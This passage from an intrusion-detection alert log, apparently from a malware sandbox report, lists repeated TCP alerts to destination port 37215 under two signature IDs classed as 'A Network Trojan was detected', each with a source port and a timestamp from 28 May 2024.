            SID:2829579
            Source Port:37726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936984
            SID:2835222
            Source Port:49222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308783
            SID:2835222
            Source Port:46000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870708
            SID:2829579
            Source Port:46246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052809
            SID:2835222
            Source Port:43152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919462
            SID:2835222
            Source Port:38178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026415
            SID:2829579
            Source Port:41914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936867
            SID:2829579
            Source Port:46108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346170
            SID:2829579
            Source Port:57942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920088
            SID:2835222
            Source Port:54320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917004
            SID:2829579
            Source Port:43050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290602
            SID:2829579
            Source Port:59172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423652
            SID:2835222
            Source Port:38442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870185
            SID:2829579
            Source Port:45432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896066
            SID:2835222
            Source Port:46990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861452
            SID:2835222
            Source Port:39068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872199
            SID:2835222
            Source Port:59614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922123
            SID:2835222
            Source Port:35432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066608
            SID:2835222
            Source Port:52352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.454247
            SID:2829579
            Source Port:33114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853229
            SID:2829579
            Source Port:53232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.379675
            SID:2829579
            Source Port:46588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326610
            SID:2835222
            Source Port:57392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486744
            SID:2829579
            Source Port:48588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334788
            SID:2835222
            Source Port:39606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862084
            SID:2829579
            Source Port:35012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941827
            SID:2835222
            Source Port:59194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998623
            SID:2829579
            Source Port:45480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.061932
            SID:2829579
            Source Port:44666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910183
            SID:2835222
            Source Port:35306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927307
            SID:2835222
            Source Port:44956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043204
            SID:2829579
            Source Port:58952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948324
            SID:2829579
            Source Port:47000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990011
            SID:2835222
            Source Port:55626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296441
            SID:2835222
            Source Port:50594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760218
            SID:2835222
            Source Port:38058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.309149
            SID:2829579
            Source Port:45648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309254
            SID:2829579
            Source Port:49316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771672
            SID:2829579
            Source Port:60586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858395
            SID:2835222
            Source Port:60330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.873090
            SID:2835222
            Source Port:51690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946759
            SID:2835222
            Source Port:41020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756920
            SID:2829579
            Source Port:42364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743423
            SID:2829579
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927515
            SID:2835222
            Source Port:45568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704608
            SID:2829579
            Source Port:38944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519838
            SID:2835222
            Source Port:37236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899775
            SID:2829579
            Source Port:60312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051197
            SID:2835222
            Source Port:58246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077911
            SID:2829579
            Source Port:60858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434529
            SID:2829579
            Source Port:59622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922308
            SID:2835222
            Source Port:58586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910809
            SID:2829579
            Source Port:50190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871793
            SID:2829579
            Source Port:37410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866038
            SID:2829579
            Source Port:33274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314055
            SID:2829579
            Source Port:50688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.372565
            SID:2835222
            Source Port:33534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922144
            SID:2835222
            Source Port:41492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929492
            SID:2835222
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776842
            SID:2829579
            Source Port:40692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069455
            SID:2835222
            Source Port:45784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810386
            SID:2829579
            Source Port:54966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493603
            SID:2835222
            Source Port:57532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543457
            SID:2835222
            Source Port:41464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.063911
            SID:2829579
            Source Port:38662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.858266
            SID:2835222
            Source Port:34672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443213
            SID:2835222
            Source Port:40888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.945392
            SID:2829579
            Source Port:54856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822153
            SID:2829579
            Source Port:47230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005068
            SID:2829579
            Source Port:46586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180610
            SID:2829579
            Source Port:40028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289364
            SID:2829579
            Source Port:38552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866872
            SID:2829579
            Source Port:34330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053825
            SID:2835222
            Source Port:38270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675814
            SID:2835222
            Source Port:44132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899873
            SID:2835222
            Source Port:43802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.973799
            SID:2835222
            Source Port:58350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818459
            SID:2829579
            Source Port:35406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945480
            SID:2835222
            Source Port:38972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770767
            SID:2835222
            Source Port:47248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875014
            SID:2829579
            Source Port:56128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.441284
            SID:2835222
            Source Port:38046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963565
            SID:2829579
            Source Port:38252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937107
            SID:2835222
            Source Port:35692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691626
            SID:2829579
            Source Port:59882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682268
            SID:2829579
            Source Port:60012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989079
            SID:2829579
            Source Port:33636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989853
            SID:2835222
            Source Port:41196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344250
            SID:2829579
            Source Port:33780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508175
            SID:2835222
            Source Port:55542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872335
            SID:2829579
            Source Port:58672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575419
            SID:2829579
            Source Port:32830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910502
            SID:2829579
            Source Port:45092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341186
            SID:2835222
            Source Port:53028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757599
            SID:2835222
            Source Port:38636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989097
            SID:2829579
            Source Port:60816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425980
            SID:2835222
            Source Port:36288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618141
            SID:2829579
            Source Port:42906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995981
            SID:2829579
            Source Port:52934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952010
            SID:2835222
            Source Port:39482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005604
            SID:2835222
            Source Port:55028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862617
            SID:2829579
            Source Port:60688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.859609
            SID:2835222
            Source Port:47868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065855
            SID:2835222
            Source Port:46524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767709
            SID:2835222
            Source Port:59560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046998
            SID:2835222
            Source Port:34980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067606
            SID:2829579
            Source Port:36088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294595
            SID:2829579
            Source Port:38794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936195
            SID:2829579
            Source Port:50394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066817
            SID:2835222
            Source Port:49878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.025179
            SID:2835222
            Source Port:55784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.949680
            SID:2835222
            Source Port:38960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.067384
            SID:2835222
            Source Port:43288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.000661
            SID:2835222
            Source Port:44790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060343
            SID:2835222
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019032
            SID:2829579
            Source Port:33816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059994
            SID:2835222
            Source Port:35532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.019837
            SID:2835222
            Source Port:50864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000254
            SID:2829579
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014573
            SID:2835222
            Source Port:37594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836986
            SID:2835222
            Source Port:36068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927415
            SID:2835222
            Source Port:52008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572133
            SID:2835222
            Source Port:37200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808494
            SID:2829579
            Source Port:50982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041864
            SID:2835222
            Source Port:37556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919592
            SID:2835222
            Source Port:45286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.621548
            SID:2829579
            Source Port:40084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663848
            SID:2829579
            Source Port:49390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275372
            SID:2829579
            Source Port:47814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252106
            SID:2835222
            Source Port:50280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012422
            SID:2835222
            Source Port:43834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822082
            SID:2835222
            Source Port:36158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604240
            SID:2829579
            Source Port:59978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956293
            SID:2829579
            Source Port:47900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084503
            SID:2829579
            Source Port:54206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734366
            SID:2835222
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969472
            SID:2835222
            Source Port:46290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499772
            SID:2835222
            Source Port:38766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919599
            SID:2829579
            Source Port:42140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681677
            SID:2829579
            Source Port:33108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851164
            SID:2829579
            Source Port:56566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046474
            SID:2829579
            Source Port:35002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506676
            SID:2835222
            Source Port:45188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038399
            SID:2835222
            Source Port:56284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790122
            SID:2835222
            Source Port:58668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767052
            SID:2835222
            Source Port:37952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938036
            SID:2835222
            Source Port:57508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938190
            SID:2829579
            Source Port:55332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279543
            SID:2829579
            Source Port:49580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320277
            SID:2835222
            Source Port:52556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459377
            SID:2835222
            Source Port:47440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926257
            SID:2835222
            Source Port:49008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870921
            SID:2829579
            Source Port:59944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997776
            SID:2835222
            Source Port:51430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295156
            SID:2835222
            Source Port:55712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852112
            SID:2835222
            Source Port:35238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507069
            SID:2835222
            Source Port:49192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995601
            SID:2835222
            Source Port:57360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676130
            SID:2829579
            Source Port:59204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848791
            SID:2835222
            Source Port:35230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047671
            SID:2835222
            Source Port:37784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998261
            SID:2829579
            Source Port:52590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180437
            SID:2829579
            Source Port:57448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582779
            SID:2829579
            Source Port:47312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.724003
            SID:2829579
            Source Port:33112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654760
            SID:2829579
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796061
            SID:2829579
            Source Port:32840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776313
            SID:2835222
            Source Port:33338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807274
            SID:2829579
            Source Port:50986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811477
            SID:2835222
            Source Port:57760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604762
            SID:2829579
            Source Port:49646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824650
            SID:2835222
            Source Port:47166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713054
            SID:2835222
            Source Port:39450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034821
            SID:2835222
            Source Port:59756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746852
            SID:2835222
            Source Port:33260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860581
            SID:2835222
            Source Port:56784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507993
            SID:2835222
            Source Port:51050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775605
            SID:2835222
            Source Port:58560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604725
            SID:2829579
            Source Port:54728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945858
            SID:2829579
            Source Port:60694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336305
            SID:2835222
            Source Port:41896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841848
            SID:2829579
            Source Port:37082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951218
            SID:2835222
            Source Port:59786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966534
            SID:2835222
            Source Port:33224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506698
            SID:2829579
            Source Port:53654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.422908
            SID:2835222
            Source Port:49470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881884
            SID:2835222
            Source Port:57920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884782
            SID:2835222
            Source Port:35924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739076
            SID:2829579
            Source Port:33042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759628
            SID:2835222
            Source Port:43086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773786
            SID:2829579
            Source Port:50972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754423
            SID:2835222
            Source Port:60334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875739
            SID:2829579
            Source Port:53056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767462
            SID:2835222
            Source Port:49382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854692
            SID:2829579
            Source Port:49420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915001
            SID:2835222
            Source Port:44436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910955
            SID:2829579
            Source Port:38796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070185
            SID:2829579
            Source Port:48796
            Destination Port:37215
